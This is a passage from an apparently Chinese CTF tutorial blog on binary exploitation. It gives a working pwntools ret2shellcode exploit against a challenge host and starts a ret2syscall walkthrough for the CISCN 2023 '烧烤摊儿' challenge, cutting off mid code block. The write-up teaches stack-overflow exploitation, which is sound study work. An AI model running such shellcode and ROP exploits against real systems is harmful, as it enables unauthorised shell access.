loading=\"lazy\" decoding=\"async\" width=\"620\" height=\"198\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-40.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-173\"  sizes=\"auto, (max-width: 620px) 100vw, 620px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u6211\u4eec\u9700\u8981\u8f93\u5165\u4e00\u4e2a\u5b57\u7b26\u4e32<code>s<\/code>\uff0c\u53d1\u73b0\u5728\u8fd9\u4e2a<code>read<\/code>\u51fd\u6570\u5904\u5b58\u5728\u6808\u6ea2\u51fa\uff0c\u4f46\u53ea\u80fd\u521a\u521a\u597d\u8986\u76d6\u5230\u8fd4\u56de\u5730\u5740\uff0c\u53c8\u53ef\u4ee5\u770b\u5230\uff1a<code>strcpy(buff, 
s)<\/code>\u5c06\u6211\u4eec\u8f93\u5165\u7684\u5b57\u7b26\u4e32<code>s<\/code>\u88ab\u590d\u5236\u5230\u4e86<code>buff<\/code>\u4e0a\u9762\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\uff0c<code>buff<\/code>\u662f\u5728<code>bss<\/code>\u6bb5\u4e0a\u7684\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-41.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-41.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"401\" height=\"74\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-41.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-174\"  sizes=\"auto, (max-width: 401px) 100vw, 401px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u5229\u7528ret2shellcode\u6280\u672f\uff0c\u5411<code>buff<\/code>\u4e2d\u5199\u5165shellcode\uff0c\u7136\u540e\u901a\u8fc7\u6808\u6ea2\u51fa\u6765\u6267\u884c<code>buff<\/code>\u4e2d\u7684shellcode\u5373\u53ef\u3002需要注意<code>strcpy<\/code>遇到第一个<code>\\x00<\/code>就会停止复制，所以shellcode本身不能含有<code>\\x00<\/code>字节（可以用<code>b'\\x00' in shellcode<\/code>检查；本例中<code>shellcraft.sh()<\/code>生成的shellcode不含该字节），而payload里用来填充的<code>\\x00<\/code>恰好把复制截断在shellcode末尾；栈上的返回地址是由前面的<code>read<\/code>直接写入的，不受<code>strcpy<\/code>截断的影响。攻击代码如下\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 
16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *\n\ncontext.arch = \"amd64\"\np = remote(\"node5.anna.nssctf.cn\", 25511)\n\nshellcode = asm(shellcraft.sh())\nbuff = 0x4040A0\n\npayload = shellcode.ljust(0x100, b'\\x00') + b'=Triode=' + p64(buff)\n\np.sendline(payload)\n\np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: 
#81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">context<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">arch <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">amd64<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">node5.anna.nssctf.cn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">25511<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">shellcode <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">asm<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">shellcraft<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sh<\/span><span style=\"color: #ECEFF4\">())<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">buff <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4040A0<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> shellcode<\/span><span style=\"color: 
#ECEFF4\">.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">buff<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u8fd0\u884c\u5c31\u53ef\u4ee5\u5f97\u5230shell\u4e86\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-42.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-42.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"302\" height=\"55\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-42.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-175\"  sizes=\"auto, (max-width: 302px) 100vw, 302px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6ce8\uff1a一般而言，程序都会开启栈不可执行（NX）保护，此时不仅栈不可执行，<code>bss<\/code>段和<code>data<\/code>段通常也同样不可执行；只有当目标段确实带有执行权限（例如二进制自带RWX段）时，向<code>bss<\/code>段或<code>data<\/code>段写入shellcode才有效。否则通常要先利用ret2csu与ret2syscall构造ROP链调用<code>mprotect<\/code>把一段可写内存改为可执行，再向其中写入shellcode来攻击<\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">ret2syscall<\/h2>\n\n\n\n<p>ret2syscall\u987e\u540d\u601d\u4e49\u5c31\u662f\u63a7\u5236\u7cfb\u7edf\u6267\u884c\u7cfb\u7edf\u8c03\u7528\u6765\u83b7\u5f97shell\uff0c\u4e00\u822c\u5728\u7a0b\u5e8f\u9759\u6001\u94fe\u63a5\u7684\u60c5\u51b5\u4e0b\u4f7f\u7528\uff08静态链接时libc已经被编进二进制里，没有单独加载的libc可供泄漏基址，<code>system<\/code>等函数也往往没有被链接进来，所以没有办法使用ret2libc技术进行get shell；但静态二进制里的gadget很多，适合直接构造系统调用\uff09<\/p>\n\n\n\n<p>\u572832\u4f4d\u7a0b\u5e8f\u4e2d\uff0cret2syscall\u4e3b\u8981\u4f9d\u8d56\u4e8e<code>int 
0x80<\/code>\u6c47\u7f16\u6bb5\uff0c\u800c\u572864\u4f4d\u7cfb\u7edf\u4e2d\uff0cret2syscall\u5219\u4e3b\u8981\u4f9d\u8d56\u4e8e<code>syscall<\/code>\u6c47\u7f16\u6bb5\uff0c\u8fd9\u4e24\u6bb5\u6c47\u7f16\u90fd\u4f1a\u901a\u8fc7\u8c03\u7528\u4e00\u4e9b\u5bc4\u5b58\u5668\u7684\u503c\u6765\u8fdb\u884c\u7cfb\u7edf\u8c03\u7528\uff0cLinux\u7cfb\u7edf\u7684\u7cfb\u7edf\u8c03\u7528\u53ef\u4ee5\u5b9e\u73b0\u7684\u51fd\u6570\uff0c\u5bf9\u5e94\u7684\u7f16\u53f7\u4ee5\u53ca\u53c2\u6570\u6240\u5b58\u653e\u7684\u5bc4\u5b58\u5668\u53ef\u4ee5\u5728<a href=\"https:\/\/www.chromium.org\/chromium-os\/developer-library\/reference\/linux-constants\/syscalls\/\">Linux System Call Table<\/a>\u4e2d\u67e5\u8be2\uff0c\u5e38\u7528\u7684\u4e00\u822c\u6709<code>read<\/code>\uff0c<code>write<\/code>\u4ee5\u53ca<code>execve<\/code>\u3002ret2syscall\u6709\u65f6\u9700\u8981\u7528\u5230ret2csu\u7684\u6280\u672f\u6765\u5411\u6307\u5b9a\u5bc4\u5b58\u5668\u6765\u5199\u5165\u60f3\u8981\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[CISCN 2023 \u521d\u8d5b] \u70e7\u70e4\u644a\u513f<\/h4>\n\n\n\n<p>\u9898\u76ee\uff1a<a href=\"https:\/\/www.nssctf.cn\/problem\/4055\">CISCN 2023 \u521d\u8d5b-\u70e7\u70e4\u644a\u513f | NSSCTF<\/a><\/p>\n\n\n\n<p>\u901a\u8fc7<code>file<\/code>\u547d\u4ee4\u53ef\u4ee5\u770b\u5230\u8fd9\u662f\u4e2a\u9759\u6001\u94fe\u63a5\u7684\u7a0b\u5e8f\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-43.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-43.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"692\" 
height=\"121\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-43.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-176\"  sizes=\"auto, (max-width: 692px) 100vw, 692px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u76f4\u63a5IDA\u53cd\u7f16\u8bd1\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-44.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-44.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"519\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-44.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-177\"  sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u663e\u7136\u6709\u4e00\u4e2a\u7c7b\u4f3c\u5546\u5e97\u83dc\u5355\u7684\u4e1c\u897f\uff0c\u53d1\u73b0\u6709\u4e2a<code>if ( own )<\/code>\u7684\u5224\u65ad\uff0c\u4ea4\u53c9\u5f15\u7528<code>own<\/code>\u8fd9\u4e2a\u53d8\u91cf\u53d1\u73b0\u4f1a\u8fdb\u5165<code>vip<\/code>\u51fd\u6570\uff0c\u8be5\u51fd\u6570\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a 
href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-45.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-45.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"204\" height=\"229\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-45.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-178\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\uff08\u56e0\u4e3a\u7f16\u7801\u95ee\u9898\uff0c\u4e2d\u6587\u5e76\u4e0d\u80fd\u6b63\u5e38\u663e\u793a\uff09<\/p>\n\n\n\n<p>\u901a\u8fc7\u5bf9\u529f\u80fd\u7684\u5206\u6790\u53ef\u4ee5\u5927\u81f4\u77e5\u9053\u5f53\u6211\u4eec\u4f59\u989d\u5927\u4e8e<code>100000<\/code>\u7684\u65f6\u5019\u53ef\u4ee5\u628a\u5546\u5e97\u4e70\u4e0b\u6765\uff08\u4e5f\u5c31\u662f\u8ba9<code>own<\/code>\u7b49\u4e8e<code>1<\/code>\uff09\uff0c\u6b64\u65f6\u6211\u4eec\u5c31\u53ef\u4ee5\u8fdb\u5165<code>gaiming<\/code>\u51fd\u6570\uff08\u53ef\u4ee5\u7ed9\u5546\u5e97\u6539\u540d\uff09\u3002\u7ffb\u9605\u51fd\u6570\u53d1\u73b0<code>pijiu<\/code>\u8fd9\u4e2a\u51fd\u6570\u5728\u8d2d\u4e70\u7684\u65f6\u5019\u4f3c\u4e4e\u5e76\u6ca1\u6709\u5bf9\u6570\u91cf\u8fdb\u884c\u9650\u5236\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-46.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-46.png'><img class=\"lazyload 
lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"553\" height=\"422\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-46.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-179\"  sizes=\"auto, (max-width: 553px) 100vw, 553px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8d2d\u4e70\u8d1f\u6570\u6570\u91cf\u7684\u5546\u54c1\u6765\u8ba9\u81ea\u5df1\u7684\u4f59\u989d\u589e\u52a0\uff0c\u4ece\u800c\u4e70\u4e0b\u5546\u5e97\uff0c\u5148\u770b\u770b<code>gaiming<\/code>\u51fd\u6570\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-47.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-47.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"607\" height=\"197\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-47.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-180\"  sizes=\"auto, (max-width: 607px) 100vw, 607px\" 
\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7<code>scanf<\/code>\u8f93\u5165\u5b57\u7b26\u4e32\u8fdb\u884c\u6539\u540d\uff0c\u5e76\u5c06\u6539\u7684\u540d\u5b57\u653e\u5230\u5904\u4e8edata\u6bb5\u4e0a\u7684<code>name<\/code>\u4e2d\u3002需要注意<code>scanf<\/code>的<code>%s<\/code>在未指定宽度时不做长度检查（这也是本题溢出的来源），但遇到空白字符（<code>0x09<\/code>~<code>0x0d<\/code>、<code>0x20<\/code>）就会停止读取，因此后面ROP链里的每个gadget地址都不能包含这些字节，而<code>\\x00<\/code>不属于空白字符，可以正常出现。\u56e0\u4e3a\u662f\u9759\u6001\u94fe\u63a5\u7684\u7a0b\u5e8f\uff0c\u6240\u4ee5\u5e76\u4e0d\u80fd\u901a\u8fc7ret2libc\u6280\u672f\u6765get shell\uff0c\u90a3\u4e48\u5c31\u53ef\u80fd\u9700\u8981\u4f7f\u7528ret2syscall\u6280\u672f\u6765get shell\u4e86\uff0c\u901a\u8fc7ROPgadget\u53ef\u4ee5\u627e\u5230<code>syscall<\/code>\u6240\u5728\u7684\u4f4d\u7f6e\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-48.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-48.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"481\" height=\"159\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-48.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-181\"  sizes=\"auto, (max-width: 481px) 100vw, 481px\" 
\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u901a\u8fc7\u67e5\u8be2\u53ef\u4ee5\u77e5\u9053\u572864\u4f4d\u7a0b\u5e8f\u4e2d<code>execve<\/code>\u7684\u7cfb\u7edf\u8c03\u7528\u7f16\u53f7\u4e3a<code>0x3b<\/code>\uff08\u5b58\u653e\u5728<code>rax<\/code>\u5bc4\u5b58\u5668\u4e2d\uff09\uff0c\u4e14<code>rdi<\/code>\uff0c<code>rsi<\/code>\uff0c<code>rdx<\/code>\u5bc4\u5b58\u5668\u4e2d\u5206\u522b\u5b58\u653e<code>filename<\/code>\uff0c<code>argv<\/code>\u4ee5\u53ca<code>envp<\/code>（三个参数的意义在下文ret2csu的例题[0xgame 2024 Week1] ret2csu中有提及）\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u6784\u9020<code>execve('\/bin\/sh', 0, 0)<\/code>\u6765\u5b9e\u73b0\u83b7\u5f97shell（Linux允许<code>argv<\/code>和<code>envp<\/code>为NULL，但<code>filename<\/code>必须是以<code>\\x00<\/code>结尾的字符串，所以下面的payload写入的是<code>\/bin\/sh\\x00<\/code>），\u901a\u8fc7\u5bfb\u627e\u53ef\u4ee5\u5206\u522b\u627e\u5230<code>pop rax<\/code>\uff0c<code>pop rdi<\/code>\uff0c<code>pop rsi<\/code>\u4ee5\u53ca\u4e00\u6761<code>pop rdx pop rbx<\/code>（这条gadget会多弹出一个值到<code>rbx<\/code>，所以ROP链里要连续放两个0），\u90a3\u4e48\u5c31\u53ef\u4ee5\u901a\u8fc7\u5148\u5411\u5904\u4e8edata\u6bb5\u7684<code>name<\/code>\u4e2d\u5b58\u5165<code>\/bin\/sh<\/code>\uff0c\u968f\u540e\u6784\u9020\u5982\u4e0brop\u94fe\u5373\u53ef\u901a\u8fc7ret2syscall\u6765\u83b7\u5f97shell\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" 
